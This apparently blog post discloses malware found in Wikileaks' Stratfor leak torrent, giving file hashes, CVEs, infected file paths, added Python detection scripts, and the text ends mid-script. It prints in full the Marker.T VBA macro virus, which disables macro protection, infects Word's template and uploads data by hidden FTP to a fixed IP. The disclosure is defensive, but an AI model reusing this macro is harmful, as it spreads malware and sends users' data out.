Click here for the second post on this topic, which includes more detailed technical information.
Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.
In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.
This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.
Beginning on February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc. (more widely known as Stratfor). The publication began with 200 emails, with Wikileaks progressively publishing more through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was released.
The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreword in an attempt to explain the history of the documents, which is still contested.)
It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office in New York during the nine-month period in which #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents refer to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.
The content of the emails, though of obvious political and social significance, is not relevant to this post. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak are malicious: they are designed, among other things, to retrieve detailed information about the computers that have downloaded them and send it to a variety of remote systems.
My research is still in progress; however, the wide circulation of this data and the apparent lack of any notification of the danger in these files have convinced me to publish what little I have found immediately.
I ought to be clear from the outset: I have no information linking Wikileaks, Assange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That may well change quickly as research progresses, but at no point should this post be considered finger-pointing. Its purpose is not to assign responsibility but to ensure that the journalists and activists who are downloading these files, or who have already downloaded them, understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files, that would be a bonus.
The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain, wlstorage.net. While the domains are separate, wlstorage.net is linked directly from the Wikileaks Global Intelligence Files web page (at https://wikileaks.org/gifiles), and the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users into downloading the malicious files.
The link to wlstorage.net points to a list of torrent files. As mentioned previously, Wikileaks began with a small initial leak of documents and released progressively more documents. Each of these torrents is a different version of the leak, which over time grew to include more and more files as they were apparently reviewed by the Wikileaks team. Notice that the very last torrent uses a different compression method and file nomenclature than the rest of the torrents. It is in this very last file, and this file only, that I have identified malware.
The SSL certificate for both domains is the same (the host lookups and certificate output are reproduced with the other raw data later in this post).
I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z and gifiles-2014.tar.bz2. I was unable to identify any malware in gifiles-20121104151320.7z, which is notable for a number of reasons. Each of these files is massive: gifiles-20121104151320.7z is close to 3GB while compressed, and gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different compression scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except gifiles-2014.tar.bz2, which uses tar and bzip2, commonly used on Windows and Linux. It's reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions.
I have been working on extracting the payloads from the .DOC files first, before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:
117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2
17793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358
117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655
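The hashes above are the indicators a defender actually needs: anyone who has already extracted the dump can hash its members and check them against this list. The following script is an added example, not code from the original post. It streams each file through MD5, SHA-1 and SHA-256 (so multi-gigabyte members never have to fit in memory), walks a directory tree, and reports any file whose digest matches the indicators listed above; the `demo()` function builds a constructed two-file tree in a temporary directory, registers the constructed sample's own SHA-256 as an extra indicator, and scans it.

```python
# Added example, not code from the original post: walk an extracted dump and
# flag any file whose MD5, SHA-1 or SHA-256 matches the indicators given above.
import hashlib
import os
import tempfile
from pathlib import Path

# Digests exactly as listed in the post for the three identical Marker.T carriers.
KNOWN_BAD = {
    "6451dc0fc47122e75e3af66c9547d420": "117687_Lithium.doc",
    "88eaf2aaa211d761c190d310d181f9f4e8d3853b": "117687_Lithium.doc",
    "34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2": "117687_Lithium.doc",
    "87114142e32fd455b525c900e4342475": "17793_Hybrid write-up.doc",
    "cfda55de190f6b71434b4a4b66b2a372773133db": "17793_Hybrid write-up.doc",
    "9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358": "17793_Hybrid write-up.doc",
    "6fde4a58f42deba3613030cbb93aef2b": "117870_Hybrid write-up2.doc",
    "07191e232304f3c7853e18916bb89f8af4cda3b1": "117870_Hybrid write-up2.doc",
    "32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655": "117870_Hybrid write-up2.doc",
}


def hash_bytes(data):
    """Return (md5, sha1, sha256) hex digests of an in-memory byte string."""
    return (hashlib.md5(data).hexdigest(),
            hashlib.sha1(data).hexdigest(),
            hashlib.sha256(data).hexdigest())


def hash_file(path, chunk_size=1 << 20):
    """Return (md5, sha1, sha256) hex digests of a file, streamed in 1 MiB chunks
    so that large dump members never have to be read into memory at once."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            md5.update(block)
            sha1.update(block)
            sha256.update(block)
    return md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()


def scan_tree(root, indicators=KNOWN_BAD):
    """Hash every file under root; return {relative_posix_path: label} for matches.
    A file is reported once even if several of its digests are listed."""
    root = Path(root)
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            for digest in hash_file(path):
                if digest in indicators:
                    hits[path.relative_to(root).as_posix()] = indicators[digest]
                    break
    return hits


def demo():
    """Constructed demonstration: one 'bad' file whose SHA-256 we register as an
    indicator and one benign file, in a temporary directory, then a scan."""
    with tempfile.TemporaryDirectory() as tmp:
        attach = Path(tmp) / "attach" / "117"
        attach.mkdir(parents=True)
        bad = attach / "constructed_sample.doc"
        bad.write_bytes(b"\xd0\xcf\x11\xe0 constructed OLE2-looking sample, not real malware")
        (attach / "benign.txt").write_bytes(b"nothing to see here")
        indicators = dict(KNOWN_BAD)
        indicators[hash_file(bad)[2]] = "constructed sample"  # register its sha256
        return scan_tree(tmp, indicators)


if __name__ == "__main__":
    print(demo())  # {'attach/117/constructed_sample.doc': 'constructed sample'}
```

Point `scan_tree()` at the extracted `gifiles-2014` directory to check a real copy; matching on any one of the three digests is deliberate, since a copied indicator list often carries only one hash type per file.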
We shouldn't be convinced that this is the entire payload. The IP address in the macro has been recorded as part of Marker.T since 2002. Just to be on the safe side, I tried it: no FTP connections are being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.
There appears to be an additional, encrypted payload in these files, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.
In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.
md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38
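The point that the .DOC extension says nothing about what the file actually is (this one is RTF, and the file list later in the post also carries a Command.com and a photos.jpg.exe) is the first triage step a reviewer should automate. The script below is an added example, not code from the original post: it identifies the real container type from the file's leading bytes, flags an extension that disagrees with those bytes, and separately flags an executable hiding behind a decoy extension. The signature table and the weights given to each finding are my own; the sample names come from the post, while the sample bytes are constructed.

```python
# Added example, not from the original post: identify a file's real container type
# from its leading bytes and flag it when the extension tells a different story,
# e.g. the RTF exploit document shipped as 6566_TheSplitBetw.doc.
import os

# (magic prefix, type name, extensions that legitimately carry this type)
SIGNATURES = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2", {".doc", ".xls", ".ppt", ".msg"}),
    (b"{\\rtf", "rtf", {".rtf"}),
    (b"%PDF", "pdf", {".pdf"}),
    (b"MZ", "pe", {".exe", ".dll", ".scr"}),   # a .com with an MZ header is worth a look
    (b"PK\x03\x04", "zip", {".zip", ".docx", ".xlsx", ".pptx", ".jar"}),
    (b"7z\xbc\xaf\x27\x1c", "7z", {".7z"}),
    (b"BZh", "bzip2", {".bz2"}),
    (b"\x1f\x8b", "gzip", {".gz", ".tgz"}),
]

# Extensions a user expects to open as a document or picture; an executable
# wearing one of these before its real extension (photos.jpg.exe) is a lure.
DECOY_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".doc", ".pdf", ".txt"}


def sniff(head):
    """Return the type name whose magic matches the first bytes, or 'unknown'."""
    for magic, kind, _ in SIGNATURES:
        if head.startswith(magic):
            return kind
    return "unknown"


def classify(name, head):
    """Classify one file from its name and first bytes.
    Returns the detected type plus two boolean findings."""
    base, ext = os.path.splitext(name)
    ext = ext.lower()
    kind = sniff(head)
    allowed = next((exts for _, k, exts in SIGNATURES if k == kind), set())
    inner_ext = os.path.splitext(base)[1].lower()
    return {
        "type": kind,
        # the extension claims something other than what the bytes say
        "extension_mismatch": kind != "unknown" and ext not in allowed,
        # an executable wearing a decoy extension before its real one
        "double_extension_lure": kind == "pe" and inner_ext in DECOY_EXTENSIONS,
    }


def classify_file(path, head_len=16):
    """Read only the first bytes of a file on disk and classify it."""
    with open(path, "rb") as f:
        return classify(os.path.basename(path), f.read(head_len))


if __name__ == "__main__":
    # Constructed sample heads; only the names are taken from the post's file list.
    print(classify("6566_The Split Betw.doc", b"{\\rtf1\\ansi\\deff0"))
    print(classify("photos.jpg.exe", b"MZ\x90\x00\x03\x00"))
    print(classify("117687_Lithium.doc", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00"))
```

An RTF-in-.DOC mismatch is not malicious by itself (Word opens both), but it is exactly the kind of file a reviewer should route to a sandbox rather than a desktop, and a mismatch on a .com, .zip or image name is a stronger signal still.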
This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:
-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com]
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest
Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below. Article appeared as a straight Q and A story, everything reads balanced and fair. Please let me know if you have any questions or concerns.
V/r,
Courtney
The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.
Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.
I've been working on reverse engineering this code as well. This file does not contain VBScript macros. The most interesting tidbit I have found, apart from what is already well documented about this exploit, was recovered by scraping a bit of the shellcode using this Python script (JavaScript needs to be enabled to see the GitHub embed, or you can view it here instead; the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):
This is what was recovered (another GitHub embed, which can be viewed here for those who don't trust someone else's JavaScript):
I am still in the process of investigating this; however, I am particularly interested in the creation of an executable, C:\a.exe, as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:
"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."
At this point very few conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified here as infected with malware as part of their coverage of these document leaks. It is possible, for example, to search for and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expects this content to have been sanitized before a media organization provides it.
When downloading and viewing these files, most people are attempting to protect themselves from surveillance, things like the NSA's XKEYSCORE. Few users expect the leaked files themselves to be a threat. While there is overlap between the security precautions that protect a computer against outside surveillance and those that protect against infected files, there are significant differences. Air gapping, for example, can be an effective deterrent against surveillance and against some of the worst features of malware. However, the threat from surveillance is often considered transitory: after performing the task that needs to be protected from prying eyes, a user might not find it unreasonable to break the air gap and reconnect to the internet after deleting the secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a networked computer. All such activity is easily exploited by malicious software. To use a somewhat related analogy: Tor won't protect you from a keylogger.
This is why notification of malicious software in these files is important: so users can adjust their operational security plans to account for it.
There are a number of theories that could account for the presence of this malicious software. Perhaps the least wild-eyed of them is that Stratfor employees were receiving these malicious files through email. Whether or not those employees did anything with those files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails; perhaps so massive that roughly two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL, sometime around 2012).
That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.
This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" is of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.
The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using VirusTotal, and a significant number of antivirus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (roughly 70 antivirus programs) detected malicious software. Some files were detected by only 15 antivirus programs.
One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.
# host wikileaks.org
wikileaks.org has address 195.35.109.53
wikileaks.org has address 91.218.114.210
wikileaks.org has address 91.218.244.152
wikileaks.org has address 95.211.113.131
wikileaks.org has address 95.211.113.154
wikileaks.org has address 195.35.109.44
wikileaks.org mail is handled by 1 mx.wikileaks.org.
# host wlstorage.net
wlstorage.net has address 91.218.114.210
wlstorage.net has address 91.218.244.152
wlstorage.net has address 95.211.113.131
wlstorage.net has address 95.211.113.154
wlstorage.net has address 195.35.109.44
wlstorage.net has address 195.35.109.53
[Screenshot: The Wikileaks.Org Global Intelligence Files web page]
[Screenshot: The link to wlstorage.net from Wikileaks]
[Screenshot: The Global Intelligence Files torrent files on wlstorage.net]
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA
subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org
notBefore=Oct 14 00:00:00 2013 GMT
notAfter=Oct 14 23:59:59 2015 GMT
00b5f826
SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32

# echo |\
> openssl s_client -connect wikileaks.org:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB
MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k
aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5
WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT
G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh
a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS
gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL
u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo
hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j
tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS
TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco
NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ
EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE
AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6
Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM
AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp
U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito
dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG
AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp
bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh
e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn
uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9
ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX
fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc
tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr
ElIzcmpt7JexUF8K
-----END CERTIFICATE-----
echo |\
> openssl s_client -connect wlstorage.net:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB
MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k
aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5
WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT
G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh
a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS
gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL
u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo
hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j
tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS
TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco
NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ
EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE
AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6
Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM
AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp
U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito
dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG
AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp
bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh
e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn
uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9
ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX
fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc
tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr
ElIzcmpt7JexUF8K
-----END CERTIFICATE-----
I've identified the following exploits being used:
MARKER.T
CVE-2006-2492
CVE-2009-0557
CVE-2011-0611
CVE-2010-3333
HEAPSPRAY
Mydoom
Magistr
Pdfjsc.BP
Wordjmp.gen
Mimail
The software vulnerable to these exploits is (version omitted while research is in progress):
Adobe Acrobat
Adobe Flash Player ActiveX
Microsoft Office
Microsoft Office for Mac
Open XML File Format Converter
These exploits are contained in the following files:
gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc
gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc
gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc
gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf
gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls
gifiles-2014\gifiles\attach\117\117687_Lithium.doc
gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc
gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc
gifiles-2014\gifiles\attach\47\47247_US Congress re.doc
gifiles-2014\gifiles\attach\47\47329_US Congress re.doc
gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf
gifiles-2014\gifiles\attach\151\151784_Command.com
gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip)
gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe
gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc
gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip)
gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe
gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip)
gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe
gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf
These attachments are just phishing nonsense and don't contain malicious software, but if you scan this dump with an antivirus they may cause a positive:
gifiles-2014\gifiles\docs\34\3485657_your-friend-cj-saw-miniture-tesla-generator-in-action-live.html
gifiles-2014\gifiles\attach\20\20497_PP-001-460-891-520.html
Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
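What makes the macro above recognisable as Marker.T is a handful of behaviours rather than any one string: it runs on Document_Close, switches Options.VirusProtection off, copies its own module into Normal.dot through VBProject.VBComponents, writes an ftp script to disk and shells ftp.exe with it hidden. The script below is an added example, not code from the original post: a small indicator scorer for VBA source that looks for those behaviours, plus a helper that pulls the FTP drop host out of the generated script. The regexes and the weights are my own rough choices, not a published scheme; the two macro fragments it is run over are constructed, one mirroring the calls and the 209.201.88.110 address shown above, one benign.

```python
# Added example, not from the original post: a small indicator scorer for VBA
# source, run over a constructed fragment that mirrors the Marker.T behaviour
# shown above (auto-running on close, disabling macro virus protection,
# copying itself into Normal.dot, and shelling ftp.exe with a script file).
import re

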